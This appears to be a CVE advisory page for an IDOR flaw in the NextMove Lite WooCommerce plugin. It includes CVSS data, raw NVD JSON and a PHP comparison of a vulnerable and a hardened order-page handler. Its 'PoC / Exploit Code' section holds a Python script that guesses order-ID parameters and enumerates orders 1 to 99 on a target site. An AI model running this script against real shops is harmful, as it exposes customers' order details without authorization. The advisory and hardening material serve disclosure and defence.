Security Vulnerability Report
CVE-2026-24599 CVSS 5.3 MEDIUM

CVE-2026-24599

Published: 2026-01-23 15:16:18
Last Modified: 2026-04-15 00:35:42

Description

Authorization Bypass Through User-Controlled Key vulnerability (CWE-639, an insecure direct object reference) in XLPlugins NextMove Lite (woo-thank-you-page-nextmove-lite) allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects NextMove Lite: from n/a through <= 2.23.0.
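The weakness class named above (CWE-639) is a handler that loads a record by an identifier the client supplies and never checks that the requester is entitled to see it. The snippet below is an added illustration, not NextMove Lite's code: a generic WooCommerce-style thank-you page handler in its vulnerable form, beside a hardened form that requires either the order key WooCommerce issues at checkout or the logged-in customer's `view_order` capability. The function names, the `order_id` and `key` request parameters, and the rendered markup are assumptions; the WordPress/WooCommerce calls used (`wc_get_order`, `WC_Order::get_order_key`, `current_user_can( 'view_order', $id )`, `hash_equals`) are real APIs.

```php
<?php
// Added example (not the NextMove Lite plugin's code). Assumes a WordPress
// install with WooCommerce loaded; the function names and the 'order_id' /
// 'key' query parameters are illustrative.

// Vulnerable pattern (CWE-639): the order id comes straight from the request
// and the order is rendered for whoever supplied it. The only check is that
// the order exists, so an anonymous caller can walk ids 1..N and read each
// customer's billing details and totals.
function example_render_order_vulnerable() {
    $order_id = absint( $_GET['order_id'] ?? 0 );
    $order    = wc_get_order( $order_id );
    if ( ! $order ) {
        return '';
    }
    return example_render_order( $order );
}

// Hardened form: the id alone proves nothing, so demand proof of ownership.
// Either the request carries the per-order secret key WooCommerce generates at
// checkout (compared in constant time), or the caller is logged in and
// WooCommerce's 'view_order' meta-capability maps that user to this order.
function example_render_order_hardened() {
    $order_id = absint( $_GET['order_id'] ?? 0 );
    $order    = wc_get_order( $order_id );
    if ( ! $order ) {
        return '';
    }

    $supplied_key = isset( $_GET['key'] )
        ? sanitize_text_field( wp_unslash( $_GET['key'] ) )
        : '';
    $key_ok  = '' !== $supplied_key
        && hash_equals( $order->get_order_key(), $supplied_key );
    $user_ok = is_user_logged_in() && current_user_can( 'view_order', $order_id );

    if ( ! $key_ok && ! $user_ok ) {
        // Same empty response as for a missing order, so a probe cannot tell
        // "exists but not yours" from "does not exist" and enumerate ids.
        return '';
    }
    return example_render_order( $order );
}

// Shared rendering; everything it prints is the data an IDOR would leak.
function example_render_order( WC_Order $order ) {
    return sprintf(
        '<p>Thank you, %s. Order #%d total: %s</p>',
        esc_html( $order->get_billing_first_name() ),
        $order->get_id(),
        wp_kses_post( $order->get_formatted_order_total() )
    );
}
```

The vector on this page (PR:N, C:L, I:N, A:N) matches the vulnerable branch exactly: no privileges are needed and the impact is read-only disclosure of order data. When reviewing a thank-you or order-status page, the test is simply whether the rendered object is tied to the requester by a secret (the order key) or a session (the customer id), rather than by the guessable numeric id alone.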

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available (the NVD record carries no "configurations" block).

NextMove Lite <= 2.23.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-24599 NextMove Lite IDOR Vulnerability PoC
# Target: WordPress site with NextMove Lite plugin <= 2.23.0
#
# Caveats: the advisory does not name the vulnerable request parameter, so
# the parameter names tried below are guesses, and the keyword match is a
# weak heuristic (almost any WooCommerce page mentions "order"). Treat a hit
# as a lead to confirm manually, not as proof of exploitability.


def check_vulnerability(target_url):
    """
    Check if target is vulnerable to CVE-2026-24599 IDOR vulnerability
    """
    # Try to access order page with manipulated order ID.
    # Replace test_order_id with a valid order ID from the target site.
    test_order_id = 1

    # Method 1: Direct URL manipulation
    vulnerable_endpoints = [
        f"{target_url}/?nextmove_order_id={test_order_id}",
        f"{target_url}/?order_id={test_order_id}",
        f"{target_url}/?wc_order={test_order_id}",
        f"{target_url}/thank-you/?order={test_order_id}",
    ]

    for endpoint in vulnerable_endpoints:
        try:
            response = requests.get(endpoint, timeout=10)
            # Check if response contains sensitive order data
            if response.status_code == 200:
                # Look for order-related keywords in response
                if any(keyword in response.text.lower()
                       for keyword in ['order', 'thank you', 'confirmation']):
                    print(f"[+] Potential vulnerability found at: {endpoint}")
                    print("[+] Response contains order-related content")
                    return True
        except requests.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")

    return False


def exploit_idor(target_url, order_id):
    """
    Exploit IDOR vulnerability to retrieve order information
    """
    exploit_url = f"{target_url}/?nextmove_order_id={order_id}"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }

    try:
        response = requests.get(exploit_url, headers=headers, timeout=10)
        if response.status_code == 200:
            # Extract sensitive information from response
            print(f"[+] Successfully accessed order ID: {order_id}")
            print(f"[+] Response length: {len(response.text)} bytes")
            return response.text
    except requests.RequestException as e:
        print(f"[-] Exploit failed: {e}")

    return None


# Usage example
if __name__ == "__main__":
    target = "https://example.com/checkout"  # Replace with actual target
    if check_vulnerability(target):
        print("[!] Target appears to be vulnerable to CVE-2026-24599")
        # Try to enumerate multiple orders
        for order_id in range(1, 100):
            exploit_idor(target, order_id)
    else:
        print("[-] Target does not appear to be vulnerable")

References

https://patchstack.com/database/Wordpress/Plugin/woo-thank-you-page-nextmove-lite/vulnerability/wordpress-nextmove-lite-plugin-2-23-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-24599",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-23T15:16:18.110",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Authorization Bypass Through User-Controlled Key vulnerability in XLPlugins NextMove Lite woo-thank-you-page-nextmove-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects NextMove Lite: from n/a through <= 2.23.0."
      },
      {
        "lang": "es",
        "value": "Vulnerabilidad de elusión de autorización a través de clave controlada por el usuario en XLPlugins NextMove Lite woo-thank-you-page-nextmove-lite permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a NextMove Lite: desde n/a hasta <= 2.23.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://patchstack.com/database/Wordpress/Plugin/woo-thank-you-page-nextmove-lite/vulnerability/wordpress-nextmove-lite-plugin-2-23-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve",
        "source": "[email protected]"
      }
    ]
  }
}